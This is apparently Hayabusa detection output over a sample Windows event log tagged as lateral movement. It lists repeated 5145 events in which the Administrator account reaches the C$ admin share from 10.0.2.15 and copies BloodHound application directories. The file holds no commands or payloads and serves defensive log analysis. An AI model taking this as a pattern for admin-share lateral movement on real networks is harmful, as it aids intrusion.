+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\css  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\data  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.758 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\deferred  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\effects  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\event  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\exports  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\manipulation  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.768 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\queue  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\traversing  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jquery\src\var  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\js-tokens  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\jszip  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.778 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\keycode\test  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.788 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.798 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\dist\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.gexf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.808 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.graphml  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.image  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.spreadsheet  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.svg  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.818 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.exporters.xlsx  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.helpers.graph  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.dagre  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceAtlas2  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.forceLink  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.828 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.fruchtermanReingold  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.layouts.noverlap  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.cypher  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.gexf  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
